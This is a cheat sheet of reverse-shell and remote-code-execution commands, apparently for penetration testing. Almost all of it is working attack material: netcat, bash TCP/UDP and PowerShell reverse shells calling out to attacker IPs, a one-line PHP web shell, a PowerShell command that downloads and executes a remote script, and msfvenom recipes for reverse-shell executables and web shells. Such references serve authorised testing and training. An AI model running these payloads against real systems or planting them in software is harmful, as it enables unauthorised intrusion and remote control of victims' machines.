Reverse Shell / RCE Cheat Sheet

Build Space


Basic reverse shell

Using netcat to get a reverse shell (note: netcat is rarely going to be present on enterprise/production systems):

nc -e /bin/sh 10.10.10.200 8888 or /bin/sh | nc 10.10.10.200 8888

& listening for it to catch it:

nc -lvnp 8888

Switches:
-l | listen mode, for inbound connections
-v | verbose
-n | numeric-only IP addresses, not DNS.
-p | local port number

Simple PHP web shell

If we can upload a file onto a target web server, or edit an existing file, this is a very simple shell:

<?php echo shell_exec($_GET['cmd']); ?>

Visit the uploaded file to use it for system commands:

http://<target>/webshell.php?cmd=<commands>

Upgrading shells

Using Python:

python -c 'import pty; pty.spawn("/bin/bash")'

Using stty:

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash");'
Ctrl-Z

# In terminal
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

Bash TCP

$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
$ 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&19

Bash UDP

# Victim
$ sh -i >& /dev/udp/10.10.10.1/8888 0>&1

# Listener
$ nc -u -lvp 8888

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

Msfvenom Payloads (non-meterpreter)

Windows Staged reverse TCP 

msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x64.exe ‌

Windows Stageless Payloads

msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe

Staged Payloads for Linux‌ 

x86 | msfvenom -p linux/x86/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf

x64 | msfvenom -p linux/x64/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf ‌

Stageless Payloads for Linux‌

x86 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf ‌

x64 | msfvenom -p linux/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf ‌

Web Shells 

asp | msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f asp > shell.asp ‌

jsp | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f raw > shell.jsp ‌

WAR shell: if we have access to a Tomcat server’s mgmt interface, we can upload a WAR file | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f war > shell.war

php | msfvenom -p php/reverse_php LHOST=<lhost> LPORT=<lport> -f raw > shell.php ‌